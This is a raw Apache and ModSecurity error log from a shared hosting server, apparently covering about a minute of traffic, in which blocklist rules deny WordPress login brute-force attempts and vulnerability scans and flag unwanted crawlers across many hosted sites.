[Tue May 26 19:57:47.233394 2026] [security2:error] [pid 93576:tid 93770] [client 74.7.244.58:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.enattafoundation.org.thedebateafrica.org"] [uri "/cgi-sys/404.html"] [unique_id "ahWt42DRMqfxdEDkoszjJQAAADo"]
[Tue May 26 19:57:47.234337 2026] [security2:error] [pid 93868:tid 94262] [client 74.7.244.58:36332] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.enattafoundation.org.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahWt40qK9k_ZUB2Vp25nFgABkx0"]
[Tue May 26 19:57:47.385301 2026] [security2:error] [pid 93868:tid 94076] [remote 57.141.2.31:21061] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWt40qK9k_ZUB2Vp25nGgABpBw"]
[Tue May 26 19:57:48.332283 2026] [core:alert] [pid 93868:tid 94273] [client 74.7.227.28:0] /home2/debatqhn/enattafoodparcel.org/.htaccess: </IfModule> without matching <IfModule> section
[Tue May 26 19:57:49.358944 2026] [autoindex:error] [pid 93868:tid 94375] [client 74.7.227.143:0] AH01276: Cannot serve directory /home2/debatqhn/enattafoundation.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:57:49.420945 2026] [security2:error] [pid 93576:tid 93794] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt5WDRMqfxdEDkoszjRgAAAFI"]
[Tue May 26 19:57:51.445803 2026] [security2:error] [pid 93576:tid 93744] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt52DRMqfxdEDkoszjdwAAACA"]
[Tue May 26 19:57:52.677147 2026] [security2:error] [pid 93868:tid 94348] [client 66.249.64.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWt6EqK9k_ZUB2Vp25nfwAAAek"]
[Tue May 26 19:57:52.677461 2026] [security2:error] [pid 93868:tid 94331] [client 66.249.64.96:62298] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWt6EqK9k_ZUB2Vp25newAAAdg"]
[Tue May 26 19:57:54.673007 2026] [security2:error] [pid 93868:tid 94299] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt6kqK9k_ZUB2Vp25nqwAAAbg"]
[Tue May 26 19:57:55.118476 2026] [security2:error] [pid 93868:tid 94141] [remote 103.95.119.103:59450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWt6kqK9k_ZUB2Vp25nwQAB2j4"]
[Tue May 26 19:57:55.907573 2026] [security2:error] [pid 93868:tid 94139] [remote 18.190.7.192:36066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWt60qK9k_ZUB2Vp25n2AAB1D0"]
[Tue May 26 19:57:57.283210 2026] [security2:error] [pid 93868:tid 94378] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt7EqK9k_ZUB2Vp25oBQAAAgc"]
[Tue May 26 19:57:58.998506 2026] [security2:error] [pid 93868:tid 94357] [client 188.190.204.117:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt7kqK9k_ZUB2Vp25oSQAAAfI"]
[Tue May 26 19:58:00.159926 2026] [security2:error] [pid 93868:tid 94343] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt70qK9k_ZUB2Vp25ocAAAAeQ"]
[Tue May 26 19:58:02.093662 2026] [security2:error] [pid 93868:tid 94318] [client 109.248.15.163:47873] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWt8UqK9k_ZUB2Vp25orQAAAcs"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 19:58:02.614469 2026] [security2:error] [pid 93868:tid 94283] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt8kqK9k_ZUB2Vp25otwAAAag"]
[Tue May 26 19:58:03.474449 2026] [security2:error] [pid 93868:tid 94197] [remote 216.185.214.209:34476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWt80qK9k_ZUB2Vp25ozQAB9F0"]
[Tue May 26 19:58:03.488197 2026] [security2:error] [pid 93576:tid 93589] [remote 78.180.151.99:33380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.151.180.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWt82DRMqfxdEDkoszkcAAAdwo"]
[Tue May 26 19:58:04.188517 2026] [security2:error] [pid 93576:tid 93746] [client 62.60.130.228:58582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWt9GDRMqfxdEDkoszkiwAAACI"]
[Tue May 26 19:58:04.261474 2026] [security2:error] [pid 93576:tid 93621] [remote 78.180.151.99:33380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.151.180.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWt9GDRMqfxdEDkoszkkgAAUyo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:58:04.516415 2026] [security2:error] [pid 93576:tid 93742] [client 62.60.130.228:50326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWt9GDRMqfxdEDkoszkmwAAAB4"]
[Tue May 26 19:58:05.442900 2026] [security2:error] [pid 93868:tid 94384] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt9UqK9k_ZUB2Vp25pAgAAAg0"]
[Tue May 26 19:58:06.569230 2026] [security2:error] [pid 93576:tid 93778] [client 62.60.130.228:64329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWt9mDRMqfxdEDkoszkwQAAAEI"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 19:58:06.833519 2026] [security2:error] [pid 93868:tid 94294] [client 185.191.171.16:32962] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-28-1/day/2022-09-07/"] [unique_id "ahWt9kqK9k_ZUB2Vp25pMwAAAbM"]
[Tue May 26 19:58:06.833611 2026] [security2:error] [pid 93868:tid 94294] [client 185.191.171.16:32962] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-28-1/day/2022-09-07/"] [unique_id "ahWt9kqK9k_ZUB2Vp25pMwAAAbM"]
[Tue May 26 19:58:07.006673 2026] [security2:error] [pid 93576:tid 93757] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWt92DRMqfxdEDkoszkyAAAAC0"]
[Tue May 26 19:58:07.007795 2026] [security2:error] [pid 93868:tid 94286] [client 66.249.64.109:64912] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWt9kqK9k_ZUB2Vp25pNwAAAas"]
[Tue May 26 19:58:07.702894 2026] [security2:error] [pid 93868:tid 94281] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt90qK9k_ZUB2Vp25pTQAAAaY"]
[Tue May 26 19:58:10.368653 2026] [security2:error] [pid 93576:tid 93830] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt-WDRMqfxdEDkoszlCAAAAHY"]
[Tue May 26 19:58:12.094914 2026] [security2:error] [pid 93868:tid 94337] [client 104.28.122.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWt-0qK9k_ZUB2Vp25pygAAAd4"]
[Tue May 26 19:58:12.610748 2026] [security2:error] [pid 93576:tid 93832] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt_GDRMqfxdEDkoszlQQAAAHg"]
[Tue May 26 19:58:15.442426 2026] [security2:error] [pid 93868:tid 94278] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt_0qK9k_ZUB2Vp25qHwAAAaM"]
[Tue May 26 19:58:15.638890 2026] [security2:error] [pid 93868:tid 94215] [remote 216.73.216.30:18955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/crm/register"] [unique_id "ahWt_0qK9k_ZUB2Vp25qIQAB22c"]
[Tue May 26 19:58:16.167963 2026] [security2:error] [pid 93868:tid 94374] [client 52.59.43.236:7586] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWuAEqK9k_ZUB2Vp25qSQAAAgM"], referer: https://thegoodsporting.com
[Tue May 26 19:58:16.409695 2026] [security2:error] [pid 93868:tid 94260] [client 74.7.244.17:50236] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "www.encaf.ktmadvance-senegal.com"] [uri "/robots.txt"] [unique_id "ahWuAEqK9k_ZUB2Vp25qVQABkQc"]
[Tue May 26 19:58:16.486616 2026] [security2:error] [pid 93868:tid 94265] [client 74.7.244.17:50236] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.encaf.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahWuAEqK9k_ZUB2Vp25qWAABln8"], referer: https://www.encaf.ktmadvance-senegal.com/robots.txt
[Tue May 26 19:58:18.207718 2026] [security2:error] [pid 93576:tid 93720] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuAWDRMqfxdEDkoszloQAAAAg"]
[Tue May 26 19:58:18.397723 2026] [security2:error] [pid 93868:tid 94068] [remote 18.190.7.192:34640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWuAkqK9k_ZUB2Vp25qqAABtxc"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:58:19.130388 2026] [security2:error] [pid 93868:tid 94119] [remote 123.30.233.13:59308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuAkqK9k_ZUB2Vp25qvgAB9DI"]
[Tue May 26 19:58:19.687912 2026] [security2:error] [pid 93868:tid 94056] [remote 123.30.233.13:59308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuA0qK9k_ZUB2Vp25q1QAB6BE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:58:20.988974 2026] [security2:error] [pid 93868:tid 94345] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuBEqK9k_ZUB2Vp25q7gAAAeY"]
[Tue May 26 19:58:21.377523 2026] [security2:error] [pid 93868:tid 94299] [client 146.174.160.129:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuBEqK9k_ZUB2Vp25rBAAAAbg"]
[Tue May 26 19:58:21.385060 2026] [security2:error] [pid 93576:tid 93581] [remote 136.110.38.51:36426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.38.110.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWuBWDRMqfxdEDkoszlzwAAWwI"]
[Tue May 26 19:58:23.173554 2026] [security2:error] [pid 93868:tid 94163] [remote 54.36.102.244:47722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuBkqK9k_ZUB2Vp25rNAABvko"]
[Tue May 26 19:58:23.390732 2026] [security2:error] [pid 93868:tid 94325] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuBkqK9k_ZUB2Vp25rMwAAAdI"]
[Tue May 26 19:58:23.481876 2026] [security2:error] [pid 93868:tid 94167] [remote 54.36.102.244:47722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuB0qK9k_ZUB2Vp25rRwABnUw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:58:26.066906 2026] [security2:error] [pid 93868:tid 94338] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuCUqK9k_ZUB2Vp25rjQAAAd8"]
[Tue May 26 19:58:26.286029 2026] [security2:error] [pid 93576:tid 93585] [remote 64.31.25.250:44842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.25.31.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWuCmDRMqfxdEDkoszmGQAACQY"]
[Tue May 26 19:58:26.675407 2026] [security2:error] [pid 93576:tid 93592] [remote 64.31.25.250:44842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.25.31.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWuCmDRMqfxdEDkoszmHAAAEg0"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 19:58:27.395247 2026] [security2:error] [pid 93576:tid 93758] [client 64.233.173.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWuC2DRMqfxdEDkoszmJwAAAC4"]
[Tue May 26 19:58:28.387827 2026] [security2:error] [pid 93576:tid 93681] [remote 51.91.98.45:44654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWuDGDRMqfxdEDkoszmMgAAHmQ"]
[Tue May 26 19:58:28.640559 2026] [security2:error] [pid 93576:tid 93822] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuDGDRMqfxdEDkoszmMQAAAG4"]
[Tue May 26 19:58:30.721021 2026] [security2:error] [pid 93576:tid 93709] [remote 51.91.98.45:44654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWuDmDRMqfxdEDkoszmRAAAcX4"], referer: https://taotechservices.com/wp-login.php
[Tue May 26 19:58:32.189668 2026] [security2:error] [pid 93576:tid 93775] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuD2DRMqfxdEDkoszmTwAAAD8"]
[Tue May 26 19:58:33.846946 2026] [security2:error] [pid 93576:tid 93756] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuEWDRMqfxdEDkoszmYQAAACw"]
[Tue May 26 19:58:39.068725 2026] [security2:error] [pid 93576:tid 93726] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuFmDRMqfxdEDkoszmsQAAAA4"]
[Tue May 26 19:58:39.532089 2026] [security2:error] [pid 93868:tid 94256] [remote 153.122.170.42:56616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuF0qK9k_ZUB2Vp25tiAACAn8"]
[Tue May 26 19:58:40.011183 2026] [security2:error] [pid 93868:tid 94242] [remote 153.122.170.42:56616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuGEqK9k_ZUB2Vp25tmwAB33U"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:58:41.093283 2026] [security2:error] [pid 93868:tid 94362] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuGEqK9k_ZUB2Vp25tvQAAAfc"]
[Tue May 26 19:58:41.874970 2026] [security2:error] [pid 93576:tid 93616] [remote 74.91.224.220:38182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuGWDRMqfxdEDkoszm4AAAKyU"]
[Tue May 26 19:58:43.983864 2026] [autoindex:error] [pid 93576:tid 93732] [client 43.136.86.241:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://aeromodellingconsultants.com
[Tue May 26 19:58:44.274463 2026] [security2:error] [pid 93868:tid 94261] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuG0qK9k_ZUB2Vp25uJQAAAZI"]
[Tue May 26 19:58:44.523635 2026] [security2:error] [pid 93868:tid 94309] [client 45.92.1.17:52466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uNQAAAcI"]
